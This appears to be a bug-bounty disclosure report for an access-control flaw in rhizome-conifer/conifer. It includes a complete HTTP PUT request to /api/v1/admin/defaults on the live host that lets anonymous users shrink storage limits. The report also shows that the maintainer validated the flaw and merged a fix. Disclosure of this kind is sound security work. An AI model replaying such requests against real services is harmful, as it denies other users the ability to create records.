Improper Privilege Management in rhizome-conifer/conifer

Valid

Reported on

Feb 17th 2022


Description

In admincontroller.py file, all APIs will perform user permission checks using admin_view function to avoid access from low-level users. However, this does not apply to API /api/v1/admin/defaults. Anonymous users can change max_size configuration which prevents other users from creating records.

Proof of Concept

  • Step 1: First, I create two accounts asdmigs78j56436 and asdmigs78j56436. When retrieving information from the API /api/v1/auth/curr_user, the value of max_size variable is 500000000.
  • Step 2: Set value for max_size via API /api/v1/admin/defaults
PUT /api/v1/admin/defaults HTTP/2
Host: conifer.rhizome.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 56
Connection: close

{"max_size":"1000",
"max_anon_size":"1000"}
  • Step 3: Create new account asdmigs78j56437. When retrieving information from the API /api/v1/auth/curr_user, the value of max_size variable is 1000. Create a new record, you will very quickly reach the maximum limit.

Note: I adjusted max_size back to the original value of 500000000

  • PoC:

Real max_size: https://drive.google.com/file/d/1JEo6MY-TGEfAUSalQwzegpOlbyukaF7p/view?usp=sharing

Change max_size: https://drive.google.com/file/d/1kfHhIDnC-coQ_AjZzRG5uY8PfYVjRpmU/view?usp=sharing

Reach limit: https://drive.google.com/file/d/1bMVclDzfQzsnzPIOeazC_zn7s2N7ka0r/view?usp=sharing

Impact

Improper Privilege Management. Anonymous users can change max_size configuration which prevents other users from creating records.

We are processing your report and will contact the rhizome-conifer/conifer team within 24 hours. 3 months ago
nhiephon modified the report
3 months ago
nhiephon modified the report
3 months ago
We have contacted a member of the rhizome-conifer/conifer team and are waiting to hear back 3 months ago
rhizome-conifer/conifer maintainer validated this vulnerability 3 months ago
nhiephon has been awarded the disclosure bounty
The fix bounty is now up for grabs
rhizome-conifer/conifer maintainer confirmed that a fix has been merged on 76ed5a 3 months ago
The fix bounty has been dropped
to join this conversation